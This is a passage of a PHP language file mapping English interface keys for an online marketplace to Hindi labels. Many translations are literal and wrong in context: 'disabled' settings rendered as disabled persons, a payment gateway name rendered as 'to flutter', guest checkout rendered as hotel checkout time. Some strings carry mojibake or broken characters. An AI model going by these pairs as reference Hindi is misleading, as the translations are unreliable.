'expected_delivery_date' => 'प्रप्त करने की अनुमानित तिथि', 'expense_Amount' => 'व्यय राशि', 'expense_Statistics' => 'व्यय सांख्यिकी', 'expense_Transaction_Statement' => 'व्यय लेनदेन विवरण', 'expense_Transactions' => 'व्यय लेनदेन', 'expense_Type' => 'व्यय प्रकार', 'expense_amount' => 'व्यय राशि', 'expense_transaction' => 'व्यय लेनदेन', 'expense_type' => 'व्यय प्रकार', 'expire date' => 'समाप्त होने की तिथि', 'expire_date' => 'समाप्त होने की तिथि', 'expired' => 'खत्म हो चुका', 'expires_on' => 'पर समय सीमा समाप्त', 'explore_now' => 'अब अन्वेषण करें', 'export' => 'निर्यात', 'extra' => 'अतिरिक्त', 'extra_Discount' => 'अतिरिक्त छूट', 'extra_discount' => 'अतिरिक्त छूट', 'extra_discount_added_successfully' => 'अतिरिक्त छूट सफलतापूर्वक जोड़ा गया', 'extra_on_discount' => 'छूट पर अतिरिक्त', 'facebook' => 'फेसबुक', 'facebook_API_Set_up_Instructions' => 'फेसबुक एपीआई ने निर्देश दिए', 'facebook_Login' => 'फेसबुक लॉग इन', 'failed' => 'असफल', 'failed To Deliver' => 'वितरित करने में विफल रहा', 'failed to delivery' => 'प्रसव के लिए विफल', 'failed!Sorry_we_can`t_complete_your_order' => 'असफल! क्षमा करें, हम आपके आदेश को पूरा नहीं कर सकते', 'failed!_Sorry_we_can`t_complete_your_order' => 'असफल! क्षमा करें, हम आपके आदेश को पूरा नहीं कर सकते', 'failed-to-deliver' => 'असफल', 'failedSorry_we_can`t_complete_your_order' => 'असफलता हम अपना आदेश पूरा नहीं कर सकते', 'failed_!_Sorry_we_can`t_complete_your_order' => 'असफल ! क्षमा करें, हम आपके आदेश को पूरा नहीं कर सकते', 'failed_To_Delivery' => 'प्रसव के लिए विफल', 'failed_to_Deliver' => 'वितरित करने में विफल रहा', 'failed_to_add_deliveryman_charge' => 'डिलीवरीमैन चार्ज जोड़ने में विफल', 'failed_to_deliver' => 'वितरित करने में विफल रहा', 'failed_to_delivery' => 'प्रसव के लिए विफल', 'false' => 'असत्य', 'faq' => 'सामान्य प्रश्न', 'fast_delivery_all_accross_the_country' => 'तेजी से डिलीवरी सभी देश में', 'faster_&_secure_way_to_pay_bill' => 'बिल का भुगतान करने का तेजी से और सुरक्षित तरीका', 'fawry_pay' => 'Fawry pay', 'feature deals' => 'फ़ीचर सौदे', 'feature_deal' => 'फ़ीचर सौदा', 'featured' => 'प्रदर्शित', 'featured deal' => 'विशेष किया गया सौदा', 'featured_Deal' => 'विशेष किया गया सौदा', 'featured_Product_From_This_Store' => 'इस स्टोर से उत्पादित उत्पाद', 'featured_Products' => 'विशेष रुप से प्रदर्शित प्रोडक्टस', 'featured_deal' => 'विशेष किया गया सौदा', 'featured_product' => 'विशेष रुप से प्रदर्शित उत्पाद', 'featured_product_for_this_season' => 'इस सीज़न के लिए विशेष उत्पादित उत्पाद', 'featured_product_from_this_store' => 'इस स्टोर से उत्पादित उत्पाद', 'featured_products' => 'विशेष रुप से प्रदर्शित प्रोडक्टस', 'featured_status_updated_successfully' => 'विशेष रूप से अद्यतन की गई स्थिति को विशेष रूप से अपडेट किया गया', 'features_Section' => 'विशेषता अनुभाग', 'feel_free_to_email_us' => 'स्वतंत्र महसूस करे हमें ईमेल करने के लिए', 'few_steps_ahead' => 'कुछ कदम आगे', 'field_name' => 'कार्यक्षेत्र नाम', 'file' => 'फ़ाइल', 'file_delete_successfully' => 'फ़ाइल को सफलतापूर्वक हटाएं', 'file_manager' => 'फ़ाइल मैनेजर', 'file_not_found' => 'फ़ाइल प्राप्त नहीं हुई', 'file_path_copied_successfully!' => 'फ़ाइल पथ सफलतापूर्वक कॉपी किया गया!', 'file_size_too_big' => 'फ़ाइल का आकार बहुत बड़ा है', 'file_type' => 'फाइल का प्रकार', 'file_upload_successfully!' => 'फ़ाइल अपलोड सफलतापूर्वक!', 'fill_in_your_email_address_below.' => 'नीचे अपना ईमेल पता भरें।', 'fill_the_form_and_press' => 'फॉर्म भरें और दबाएं', 'filter' => 'फ़िल्टर', 'filter Data' => 'फ़िल्टर डेटा', 'filter_Data' => 'फ़िल्टर डेटा', 'filter_by' => 'फिल्टर के द्वारा', 'filter_data' => 'फ़िल्टर डेटा', 'filter_options' => 'फ़िल्टर विकल्प', 'filter_order' => 'फ़िल्टर आदेश', 'find_SMTP_server_details' => 'SMTP सर्वर विवरण खोजें', 'find_and_select_products_to_see_the_differences_and_similarities_between_them' => 'उनके बीच के अंतर और समानता को देखने के लिए उत्पादों का पता लगाएं और चयन करें', 'find_us' => 'हमें लगता है', 'find_your_best_featured_product' => 'अपना सबसे अच्छा चित्रित उत्पाद खोजें', 'find_your_best_signature_product' => 'अपना सर्वश्रेष्ठ हस्ताक्षर उत्पाद खोजें', 'first' => 'पहला', 'first order' => 'पहले के आदेश', 'first_Name' => 'पहला नाम', 'first_Order' => 'पहले के आदेश', 'first_name' => 'पहला नाम', 'first_name_is_required' => 'पहला नाम आवश्यक है', 'first_step' => 'पहला कदम', 'fixed' => 'तय', 'fixed_amount' => 'निश्चित राशि', 'flash deal' => 'फादल सौदा', 'flash deal products' => 'फ्लैश डील प्रोडक्ट्स', 'flash deals' => 'फ्लैश सौदों', 'flash_Deal' => 'फादल सौदा', 'flash_Deal_Products' => 'फ्लैश डील प्रोडक्ट्स', 'flash_Deals' => 'फ्लैश सौदों', 'flash_deal' => 'फादल सौदा', 'flash_deal_b' => 'फ्लैश डील बी', 'flash_deal_table' => 'फ्लैश डील टेबल', 'flash_deals' => 'फ्लैश सौदों', 'flash_deals_update' => 'फ्लैश डील अपडेट', 'flat' => 'समतल', 'flutterwave' => 'फड़फड़ाना', 'follow' => 'अनुसरण करना', 'follow_steps' => 'चरणों का पालन करें', 'followers' => 'समर्थक', 'footer_Banner' => 'पाद बैनर', 'for' => 'के लिए', 'for_android' => 'एंड्रॉयड के लिए', 'for_app' => 'ऐप के लिए', 'for_data_entry' => 'डेटा प्रविष्टि के लिए', 'for_inhouse_deliver' => 'इनहाउस डिलीवरी के लिए', 'for_ios' => 'IOS के लिए', 'for_website' => 'वेबसाइट के लिए', 'for_you' => 'आपके लिए', 'for_âReady_Productâ_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products._For_âReady_After_Saleâ_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => ' रेडी प्रोडक्ट के लिए ग्राहक भुगतान कर सकते हैं और तुरंत प्री-अपलोड किए गए डिजिटल उत्पादों को डाउनलोड कर सकते हैं। बिक्री के बाद तैयार  के लिए ग्राहक पहले भुगतान करते हैं फिर व्यवस्थापक उन डिजिटल उत्पादों को अपलोड करता है जो डाउनलोड के लिए ग्राहकों के लिए उपलब्ध हो जाते हैं', 'for_âReady_Productâ_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products_by_admin._For_âReady_After_Saleâ_deliveries _customers_pay_first _then_admin_uploads_the_digital_products_that_become_available_to_customers_for_download' => ' रेडी प्रोडक्ट के लिए ग्राहक भुगतान कर सकते हैं और तुरंत व्यवस्थापक द्वारा प्री-अपलोड किए गए डिजिटल उत्पादों को डाउनलोड कर सकते हैं। बिक्री के बाद तैयार  के लिए ग्राहक पहले भुगतान करते हैं फिर व्यवस्थापक उन डिजिटल उत्पादों को अपलोड करता है जो डाउनलोड के लिए ग्राहकों के लिए उपलब्ध हो जाते हैं', 'for_âReady_Productâ_deliveries _customers_can_pay_&_instantly_download_pre-uploaded_digital_products_by_seller._For_âReady_After_Saleâ_deliveries _customers_pay_first _then_seller_uploads_the_digital_products_that_become_available_to_customers_for_download' => ' रेडी प्रोडक्ट के लिए ग्राहक विक्रेता द्वारा प्री-अपलोड किए गए डिजिटल उत्पादों को तुरंत भुगतान और तुरंत डाउनलोड कर सकते हैं। बिक्री के बाद तैयार  के लिए ग्राहक पहले भुगतान करते हैं फिर विक्रेता उन डिजिटल उत्पादों को अपलोड करता है जो डाउनलोड के लिए ग्राहकों के लिए उपलब्ध हो जाते हैं', 'forgot_Password' => 'पासवर्ड भूल गए', 'forgot_password' => 'पासवर्ड भूल गए', 'forgot_password ' => 'पासवर्ड भूल गए', 'forgot_password_verification_by' => 'द्वारा पासवर्ड सत्यापन भूल गए', 'forgot_your_password' => 'अपना कूट शब्द भूल गए', 'form' => 'रूप', 'form & press' => 'प्रेस और प्रेस', 'format_within' => 'के भीतर', 'fourth_step' => 'चौथा चरण', 'free' => 'मुक्त', 'free delivery' => 'नि=> शुल्क डिलिवरी', 'free_Delivery' => 'नि=> शुल्क डिलिवरी', 'free_Delivery_Amount' => 'नि=> शुल्क वितरण राशि', 'free_Delivery_Coupon' => 'नि=> शुल्क वितरण कूपन', 'free_Delivery_Over' => 'मुफ्त डिलीवरी ओवर', 'free_Delivery_Over_Amount' => 'राशि पर मुफ्त वितरण', 'free_Delivery_Responsibility' => 'नि=> शुल्क वितरण जिम्मेदारी', 'free_Shipping_Over_Order_Amount_Discount' => 'आदेश राशि छूट पर मुफ्त शिपिंग', 'free_delivery' => 'नि=> शुल्क डिलिवरी', 'free_delivery_amount' => 'नि=> शुल्क वितरण राशि', 'free_delivery_coupon' => 'नि=> शुल्क वितरण कूपन', 'free_delivery_on_coupon_discount' => 'कूपन छूट पर मुफ्त वितरण', 'free_delivery_over_amount' => 'राशि पर मुफ्त वितरण', 'free_delivery_over_amount_for_every_seller_if_they_do_not_set_any_range_yet' => 'यदि वे अभी तक कोई सीमा निर्धारित नहीं करते हैं, तो प्रत्येक विक्रेता के लिए राशि पर मुफ्त डिलीवरी', 'frequently_asked_question' => 'अक्सर पूछा गया सवाल', 'from' => 'से', 'from Navbar' => 'From Navbar', 'from admin' => 'व्यवस्थापक से', 'from below and click' => 'नीचे से और क्लिक करें', 'from left sidebar' => 'बाएं साइडबार से', 'from_Navbar' => 'From Navbar', 'from_Register_tab_press' => 'रजिस्टर टैब प्रेस से', 'from_below_and_click' => 'नीचे से और क्लिक करें', 'from_date' => 'की तिथि से', 'from_left_sidebar' => 'बाएं साइडबार से', 'full_name' => 'पूरा नाम', 'fund_add_by_admin+message' => 'फंड एडमिन+संदेश द्वारा जोड़ें', 'fund_added_successfully' => 'फंड ने सफलतापूर्वक जोड़ा', 'fwrf' => 'भनभनाना', 'gallery' => 'गैलरी', 'gateway' => 'द्वार', 'general' => 'सामान्य', 'general_Info' => 'सामान्य जानकारी', 'general_Information' => 'सामान्य जानकारी', 'general_info' => 'सामान्य जानकारी', 'general_information' => 'सामान्य जानकारी', 'general_settings' => 'सामान्य सेटिंग्स', 'general_setup' => 'सामान्य सेटअप', 'generate' => 'उत्पन्न', 'generate_Code' => 'उत्पन्न कोड', 'generate_barcode' => 'बारकोड उत्पन्न करें', 'generate_code' => 'उत्पन्न कोड', 'generate_invoice' => 'चालान उत्पन्न करें', 'generate_sitemap' => 'साइटमैप उत्पन्न करें', 'genuine' => 'असली', 'genuine_product' => 'वास्तविक उत्पाद', 'get_In' => 'अंदर आना', 'get_in' => 'अंदर आना', 'get_new_password' => 'नया पासवर्ड प्राप्त करें', 'get_started' => 'शुरू हो जाओ', 'get_your_zip_file_from_the_purchased_addons_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'खरीदे गए Addons से अपनी ज़िप फ़ाइल प्राप्त करें और इसे अपलोड करें और अपने Codecanyon उपयोगकर्ता नाम और खरीद कोड के साथ थीम को सक्रिय करें', 'get_your_zip_file_from_the_purchased_theme_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'खरीदे गए थीम से अपनी ज़िप फ़ाइल प्राप्त करें और इसे अपलोड करें और अपने Codecanyon उपयोगकर्ता नाम और खरीद कोड के साथ थीम को सक्रिय करें', 'go_to' => 'जाओ', 'go_to_Vacation_Mode' => 'वेकेशन मोड पर जाएं', 'go_to_apple_developer_page' => 'Apple डेवलपर पेज पर जाएं', 'go_to_chatbox' => 'चैटबॉक्स पर जाएं', 'go_to_checkout' => 'परिक्षण के लिए जाएं', 'go_to_shopping' => 'खरीदारी के लिए जाएं', 'go_to_the_SMTP_mail_setup_page_in_the_admin_panel' => 'व्यवस्थापक पैनल में SMTP मेल सेटअप पृष्ठ पर जाएं', 'go_to_the_facebook_developer_page' => 'फेसबुक डेवलपर पेज पर जाएं', 'go_to_vacation_mode' => 'वेकेशन मोड पर जाएं', 'gogoi' => 'गोगोई', 'good' => 'अच्छा', 'google' => 'गूगल', 'google_API_Set_up_Instructions' => 'Google API ने निर्देश दिए', 'google_credentials_updated' => 'Google क्रेडेंशियल्स अपडेट किया गया', 'google_map_API_setup' => 'Google मानचित्र API सेटअप', 'google_play_store' => 'गूगल प्ले स्टोर', 'google_plus' => 'Google Plus', 'google_tag_manager_id' => 'Google टैग मैनेजर आईडी', 'google_tag_manager_script_id_from_google' => 'Google से Google टैग मैनेजर स्क्रिप्ट आईडी', 'got_it' => 'समझ गया', 'guest_checkout' => 'मेहमान के होटल छोड़ने का समय', 'guest_customer' => 'अतिथि ग्राहक', 'halar' => 'भाग लेना', 'has_been_sent_to_' => 'को भेजा गया है', 'hash' => 'हैश', 'have_an_account' => 'एक खाता है', 'have_to_upload_zip_file' => 'ज़िप फ़ाइल अपलोड करना होगा', 'header_Banner' => 'हेडर बैनर', 'hello' => 'नमस्ते', 'help topics' => 'सहायता के विषय', 'help_&_support' => 'मदद समर्थन', 'help_&_support_section' => 'सहायता और समर्थन अनुभाग', 'help_topic' => 'मदद विषय', 'here' => 'यहाँ', 'here_in_top__left_corner_you_can_see_the' => 'यहाँ शीर्ष बाएं कोने में आप देख सकते हैं', 'hi' => 'Hi', 'high' => 'उच्च', 'high_low' => 'कम ऊँची', 'high_to_low_price' => 'उच्च मूल्य', 'highest_Products' => 'उच्चतम उत्पाद', 'hight_low' => 'हाइट लो', 'hold' => 'पकड़ना', 'holder_Name' => 'धारक का नाम', 'holder_name' => 'धारक का नाम', 'home' => 'घर', 'home_category_status' => 'गृह श्रेणी की स्थिति', 'home_status' => 'घर की स्थिति', 'host' => 'मेज़बान', 'hotline' => 'हॉटलाइन', 'hours' => 'घंटे', 'how_it_works' => 'यह काम किस प्रकार करता है', 'how_much_point' => 'कितना बिंदु', 'how_to_use' => 'का उपयोग कैसे करें', 'how_you_it_works' => 'आप कैसे काम करते हैं', 'hrs' => 'घंटे', 'i_Accept' => 'मुझे स्वीकार है', 'i_agree_to_Your' => 'मैं आपके लिए सहमत हूं', 'i_agree_to_Your_terms' => 'मैं आपकी शर्तों से सहमत हूं', 'i_agree_with_the' => 'मैं सहमत हूं', 'icon' => 'आइकन', 'icon_box' => 'आइकन बॉक्स', 'id' => 'पहचान', 'identification_number' => 'पहचान संख्या', 'identity' => 'पहचान', 'identity_Number' => 'पहचान संख्या', 'identity_Type' => 'पहचान का प्रकार', 'identity_image' => 'पहचान छवि', 'if the shipping responsibility is inhouse and product wise shipping is activated then this function will work' => 'यदि शिपिंग जिम्मेदारी घर में है और उत्पाद वार शिपिंग सक्रिय है तो यह फ़ंक्शन काम करेगा', 'if_Customer_Referral_Earning_is_disabled_above_all_settings_of_this_section_will_be_unavailable' => 'यदि ग्राहक रेफरल कमाई इस खंड की सभी सेटिंग्स से ऊपर अक्षम है, तो अनुपलब्ध होगा', 'if_GST_number_is_disabled_here_it_will_not_show_in_invoice' => 'यदि GST नंबर यहां अक्षम है, तो यह चालान में नहीं दिखाएगा', 'if_disabled _this_SMS_service_will_be_hidden_from_the_system ' => 'यदि अक्षम यह एसएमएस सेवा सिस्टम से छिपी होगी', 'if_disabled_Admin_needs_to_return_the_refund_amount_manually' => 'यदि अक्षम व्यवस्थापक को मैन्युअल रूप से रिफंड राशि वापस करने की आवश्यकता है', 'if_disabled_Digital_Payment_options_will_be_hidden_from_the_checkout_page' => 'यदि अक्षम डिजिटल भुगतान विकल्प चेकआउट पृष्ठ से छिपाए जाएंगे', 'if_disabled_POS_option_will_be_hidden_from_the_Seller_Panel' => 'यदि विक्रेता पैनल से अक्षम पीओएस विकल्प छिपा होगा', 'if_disabled_Sellers_can_not_register_themselves_from_website_or_App' => 'यदि विकलांग विक्रेता वेबसाइट या ऐप से खुद को पंजीकृत नहीं कर सकते हैं', 'if_disabled_all_your_apps_and_customer_website_will_be_functional' => 'यदि आपके सभी ऐप्स और ग्राहक वेबसाइट को अक्षम कर दिया जाएगा', 'if_disabled_brand_section_will_be_hidden_from_the_customer_app_and_website' => 'यदि विकलांग ब्रांड अनुभाग ग्राहक ऐप और वेबसाइट से छिपा होगा', 'if_disabled_customer_wallet_option_will_be_hidden_from_their_account' => 'यदि अक्षम ग्राहक वॉलेट विकल्प उनके खाते से छिपा होगा', 'if_disabled_customers_can_only_pay_through_the_system_supported_payment_methods' => 'यदि विकलांग ग्राहक केवल सिस्टम समर्थित भुगतान विधियों के माध्यम से भुगतान कर सकते हैं', 'if_disabled_customers_have_to_use_the_system-added_payment_gateways' => 'यदि विकलांग ग्राहकों को सिस्टम-वर्धित भुगतान गेटवे का उपयोग करना है', 'if_disabled_customers_will_not_receive_rewards_for_successful_referral' => 'यदि विकलांग ग्राहक सफल रेफरल के लिए पुरस्कार प्राप्त नहीं करेंगे', 'if_disabled_customers_would_not_be_able_to_add_money_to_their_wallet' => 'यदि विकलांग ग्राहक अपने बटुए में पैसे नहीं जोड़ पाएंगे', 'if_disabled_deliverymen_do_not_need_to_verify_the_order_deliveries' => 'यदि विकलांग डिलीवरीमैन को ऑर्डर डिलीवरी को सत्यापित करने की आवश्यकता नहीं है', 'if_disabled_loyalty_point_option_will_be_hidden_from_the_customers_account' => 'यदि विकलांग वफादारी बिंदु विकल्प ग्राहकों के खाते से छिपा होगा', 'if_disabled_sellers_can_not_sell_digital_products_in_their_shops' => 'यदि विकलांग विक्रेता अपनी दुकानों में डिजिटल उत्पाद नहीं बेच सकते हैं', 'if_disabled_sellers_cannot_set_the_minimum_order_amount_for_their_store_and_the_admin_will_set_it' => 'यदि विकलांग विक्रेता अपने स्टोर के लिए न्यूनतम ऑर्डर राशि सेट नहीं कर सकते हैं और व्यवस्थापक इसे सेट कर देगा', 'if_disabled_system_cannot_use_this_SMS_Gateway' => 'यदि अक्षम प्रणाली इस एसएमएस गेटवे का उपयोग नहीं कर सकती है', 'if_disabled_the Cash_on_Delivery_payment_method_will_be_hidden_from_the_checkout_page' => 'यदि डिलीवरी पर नकद अक्षम किया गया तो चेकआउट पेज से छिपाया जाएगा', 'if_disabled_the_App_Store_button_will_be_hidden_from_the_website_footer' => 'यदि अक्षम ऐप स्टोर बटन वेबसाइट पाद से छिपा होगा', 'if_disabled_the_Google_Play_Store_button_will_be_hidden_from_the_website_footer' => 'यदि अक्षम Google Play Store बटन वेबसाइट पाद से छिपा होगा', 'if_disabled_the_billing_address_will_be_hidden_from_the_checkout_page' => 'यदि अक्षम बिलिंग पते को चेकआउट पेज से छिपाया जाएगा', 'if_disabled_the_free_delivery_feature_will_be_hidden_from_the_system' => 'यदि अक्षम मुफ्त वितरण सुविधा सिस्टम से छिपी होगी', 'if_disabled_there_will_be_no_delivery_restrictions_based_on_zip_code_areas' => 'यदि अक्षम किया गया है तो ज़िप कोड क्षेत्रों के आधार पर कोई डिलीवरी प्रतिबंध नहीं होगा', 'if_disabled_there_will_be_no_minimum_order_restrictions_and_customers_can_place_any_order_amount' => 'यदि अक्षम होने पर कोई न्यूनतम आदेश प्रतिबंध नहीं होगा और ग्राहक किसी भी ऑर्डर राशि को रख सकते हैं', 'if_disabled_this_banner_will_be_hidden_from_the_website_and_customer_app' => 'यदि विकलांग यह बैनर वेबसाइट और ग्राहक ऐप से छिपा होगा', 'if_disabled_this_coupon_will_be_hidden_from_the_website_and_customer_app' => 'यदि विकलांग यह कूपन वेबसाइट और ग्राहक ऐप से छिपा होगा', 'if_disabled_this_feature_will_be_hidden_from_the_system' => 'यदि विकलांग यह सुविधा सिस्टम से छिपी होगी', 'if_disabled_this_language_will_be_hidden_from_the_entire_system' => 'यदि विकलांग यह भाषा पूरे सिस्टम से छिपी होगी', 'if_disabled_this_language_will_be_unset_as_default_for_the_entire_system' => 'यदि अक्षम यह भाषा संपूर्ण सिस्टम के लिए डिफ़ॉल्ट के रूप में अस्वाभाविक होगी', 'if_disabled_this_payment_method_will_be_hidden_from_the_checkout_page' => 'यदि अक्षम इस भुगतान विधि को चेकआउट पृष्ठ से छिपाया जाएगा', 'if_disabled_this_product_will_be_hidden_from_the_website_and_customer_app' => 'यदि विकलांग यह उत्पाद वेबसाइट और ग्राहक ऐप से छिपा होगा', 'if_disabled_this_product_will_be_removed_from_the_featured_product_section_of_the_website_and_customer_app' => 'यदि अक्षम इस उत्पाद को वेबसाइट और ग्राहक ऐप के चित्रित उत्पाद अनुभाग से हटा दिया जाएगा', 'if_disabled_this_support_ticket_will_be_inactive' => 'यदि विकलांग यह समर्थन टिकट निष्क्रिय हो जाएगा', 'if_disabled_users_must_log_in_to_the_system_to_complete_the_checkout_process' => 'यदि अक्षम उपयोगकर्ताओं को चेकआउट प्रक्रिया को पूरा करने के लिए सिस्टम में लॉग इन करना होगा', 'if_disabled_users_would_not_receive_verification_codes_on_their_registered_email_addresses' => 'यदि अक्षम उपयोगकर्ता अपने पंजीकृत ईमेल पते पर सत्यापन कोड प्राप्त नहीं करेंगे', 'if_disabled_users_would_not_receive_verification_codes_on_their_registered_phone_numbers' => 'यदि अक्षम उपयोगकर्ता अपने पंजीकृत फोन नंबर पर सत्यापन कोड प्राप्त नहीं करेंगे', 'if_enabled _customers_can_choose_digital_payment_options_during_the_checkout_process' => 'यदि सक्षम ग्राहक चेकआउट प्रक्रिया के दौरान डिजिटल भुगतान विकल्प चुन सकते हैं', 'if_enabled _the_cash_on_delivery_option_will_be_available_on_the_system._Customers_can_use_COD_as_a_payment_option' => 'यदि सक्षम किया गया तो कैश ऑन डिलीवरी विकल्प सिस्टम पर उपलब्ध होगा। ग्राहक भुगतान विकल्प के रूप में सीओडी का उपयोग कर सकते हैं', 'if_enabled _the_shipping_charge_will_increase_with_the_product_quantity' => 'यदि सक्षम किया जाता है तो शिपिंग चार्ज उत्पाद की मात्रा के साथ बढ़ेगा', 'if_enabled _this_SMS_service_will_be_available_in_the_system' => 'यदि सक्षम है तो यह एसएमएस सेवा सिस्टम में उपलब्ध होगी', 'if_enabled_Admin_can_return_the_refund_amount_directly_to_the_customers_wallet_' => 'यदि सक्षम व्यवस्थापक ग्राहकों के वॉलेट पर सीधे धनवापसी राशि वापस कर सकता है', 'if_enabled_POS_option_will_be_available_in_the_Seller_Panel' => 'यदि सक्षम POS विकल्प विक्रेता पैनल में उपलब्ध होगा', 'if_enabled_POS_will_be_available_on_the_Seller_Panel' => 'यदि सक्षम POS विक्रेता पैनल पर उपलब्ध होगा', 'if_enabled_admin_can_deliver_orders_outside_his_country' => 'यदि सक्षम व्यवस्थापक अपने देश के बाहर आदेश दे सकता है', 'if_enabled_admin_can_temporarily_pause_his_shop_activities' => 'यदि सक्षम व्यवस्थापक अस्थायी रूप से उसकी दुकान की गतिविधियों को रोक सकता है', 'if_enabled_all_your_apps_and_customer_website_will_be_temporarily_off' => 'यदि आपके सभी ऐप्स और ग्राहक वेबसाइट सक्षम करें तो अस्थायी रूप से बंद हो जाएगी', 'if_enabled_customers_can_add_money_to_their_wallet' => 'यदि सक्षम ग्राहक अपने बटुए में पैसे जोड़ सकते हैं', 'if_enabled_customers_can_have_the_wallet_option_on_their_account_and_use_it_while_placing_orders_and_getting_refunds' => 'यदि सक्षम ग्राहकों के पास अपने खाते पर वॉलेट विकल्प हो सकता है और ऑर्डर देते समय और रिफंड प्राप्त करते समय इसका उपयोग कर सकते हैं', 'if_enabled_customers_can_pay_through_different_payment_methods_outside_your_system' => 'यदि सक्षम ग्राहक आपके सिस्टम के बाहर विभिन्न भुगतान विधियों के माध्यम से भुगतान कर सकते हैं', 'if_enabled_customers_can_pay_through_external_payment_methods' => 'यदि सक्षम ग्राहक बाहरी भुगतान विधियों के माध्यम से भुगतान कर सकते हैं', 'if_enabled_customers_can_see_brands_on_the_app_and_website' => 'यदि सक्षम ग्राहक ऐप और वेबसाइट पर ब्रांड देख सकते हैं', 'if_enabled_customers_can_select_Cash_on_Delivery_as_a_payment_method_during_checkout' => 'यदि सक्षम ग्राहक चेकआउट के दौरान भुगतान विधि के रूप में डिलीवरी पर कैश का चयन कर सकते हैं', 'if_enabled_customers_can_select_Digital_Payment_during_checkout' => 'यदि सक्षम ग्राहक चेकआउट के दौरान डिजिटल भुगतान का चयन कर सकते हैं', 'if_enabled_customers_can_use_this_payment_method' => 'यदि सक्षम ग्राहक इस भुगतान विधि का उपयोग कर सकते हैं', 'if_enabled_customers_must_order_over_the_minimum_amount_of_orders_that_admin_or_sellers_set' => 'यदि सक्षम ग्राहकों को उन आदेशों की न्यूनतम राशि पर ऑर्डर करना होगा जो व्यवस्थापक या विक्रेता सेट करते हैं', 'if_enabled_customers_must_place_at_least_or_more_than_the_order_amount_that_admin_or_sellers_set' => 'यदि सक्षम ग्राहकों को आदेश राशि से कम से कम या अधिक रखना चाहिए जो व्यवस्थापक या विक्रेताओं को सेट करना चाहिए', 'if_enabled_customers_will_receive_rewards_for_each_successful_referral' => 'यदि सक्षम ग्राहक प्रत्येक सफल रेफरल के लिए पुरस्कार प्राप्त करेंगे', 'if_enabled_deliveries_will_be_available_only_in_the_added_zip_code_areas' => 'यदि सक्षम डिलीवरी केवल जोड़े गए ज़िप कोड क्षेत्रों में उपलब्ध होगी', 'if_enabled_deliverymen_can_not_upload_picture_at_the_order_deliveries_time' => 'यदि सक्षम डिलीवरीमैन ऑर्डर डिलीवरी समय पर चित्र अपलोड नहीं कर सकते हैं', 'if_enabled_deliverymen_can_upload_picture_at_the_order_deliveries_time' => 'यदि सक्षम डिलीवरीमैन ऑर्डर डिलीवरी समय पर चित्र अपलोड कर सकते हैं', 'if_enabled_deliverymen_must_verify_the_order_deliveries_by_collecting_the_OTP_from_customers' => 'यदि सक्षम डिलीवरीमैन को ग्राहकों से OTP इकट्ठा करके ऑर्डर डिलीवरी को सत्यापित करना होगा', 'if_enabled_everyone_can_see_the_App_Store_button_in_the_website_footer' => 'यदि सक्षम हो तो हर कोई वेबसाइट पाद में ऐप स्टोर बटन देख सकता है', 'if_enabled_everyone_can_see_the_Google_Play_Store_button_in_the_website_footer' => 'यदि सक्षम हो तो हर कोई वेबसाइट पाद में Google Play Store बटन देख सकता है', 'if_enabled_free_delivery_will_be_available_when_customers_order_over_a_certain_amount' => 'यदि सक्षम मुफ्त डिलीवरी उपलब्ध होगी जब ग्राहक एक निश्चित राशि पर ऑर्डर करते हैं', 'if_enabled_sellers_can_register_by_themselves_from_website_or_app' => 'यदि सक्षम विक्रेता वेबसाइट या ऐप से खुद को पंजीकृत कर सकते हैं', 'if_enabled_sellers_can_sell_digital_products' => 'यदि सक्षम विक्रेता डिजिटल उत्पाद बेच सकते हैं', 'if_enabled_sellers_can_sell_digital_products_in_their_shops' => 'यदि सक्षम विक्रेता अपनी दुकानों में डिजिटल उत्पाद बेच सकते हैं', 'if_enabled_sellers_can_send_registration_requests_to_admin' => 'यदि सक्षम विक्रेता व्यवस्थापक को पंजीकरण अनुरोध भेज सकते हैं', 'if_enabled_sellers_can_set_minimum_order_amount_for_their_stores_by_themselves' => 'यदि सक्षम विक्रेता अपने स्टोर के लिए न्यूनतम ऑर्डर राशि निर्धारित कर सकते हैं', 'if_enabled_system_can_use_this_SMS_Gateway' => 'यदि सक्षम सिस्टम इस एसएमएस गेटवे का उपयोग कर सकता है', 'if_enabled_the_Google_Play_Store_will_be_visible_in_the_website_footer_section' => 'यदि सक्षम किया गया है तो Google Play Store वेबसाइट पाद अनुभाग में दिखाई देगा', 'if_enabled_the_billing_address_will_be_shown_on_the_checkout_page' => 'यदि सक्षम किया गया तो बिलिंग पता चेकआउट पेज पर दिखाया जाएगा', 'if_enabled_the_download_button_from_the_App_Store_will_be_visible_in_the_Footer_section' => 'यदि ऐप स्टोर से डाउनलोड बटन को सक्षम किया जाए तो पाद अनुभाग में दिखाई देगा', 'if_enabled_the_free_delivery_feature_will_be_shown_from_the_system' => 'यदि सक्षम किया गया तो मुफ्त वितरण सुविधा सिस्टम से दिखाया जाएगा', 'if_enabled_the_loyalty_point_option_will_be_available_to_the_customers_account' => 'यदि सक्षम है तो वफादारी बिंदु विकल्प ग्राहकों के खाते में उपलब्ध होगा', 'if_enabled_this_banner_will_be_available_on_the_website_and_customer_app' => 'यदि सक्षम है तो यह बैनर वेबसाइट और ग्राहक ऐप पर उपलब्ध होगा', 'if_enabled_this_coupon_will_be_available_on_the_website_and_customer_app' => 'यदि सक्षम है तो यह कूपन वेबसाइट और ग्राहक ऐप पर उपलब्ध होगा', 'if_enabled_this_language_will_be_available_throughout_the_entire_system' => 'यदि सक्षम है तो यह भाषा पूरे सिस्टम में उपलब्ध होगी', 'if_enabled_this_language_will_be_set_as_default_for_the_entire_system' => 'यदि सक्षम किया गया तो यह भाषा संपूर्ण सिस्टम के लिए डिफ़ॉल्ट के रूप में सेट की जाएगी', 'if_enabled_this_product_will_be_available_on_the_website_and_customer_app' => 'यदि सक्षम है तो यह उत्पाद वेबसाइट और ग्राहक ऐप पर उपलब्ध होगा', 'if_enabled_this_product_will_be_shown_in_the_featured_product_on_the_website_and_customer_app' => 'यदि सक्षम किया गया तो यह उत्पाद वेबसाइट और ग्राहक ऐप पर चित्रित उत्पाद में दिखाया जाएगा', 'if_enabled_this_support_ticket_will_be_active' => 'यदि सक्षम है तो यह समर्थन टिकट सक्रिय होगा', 'if_enabled_users_can_complete_the_checkout_process_without_logging_in_to_the_system' => 'यदि सक्षम उपयोगकर्ता सिस्टम में लॉग इन 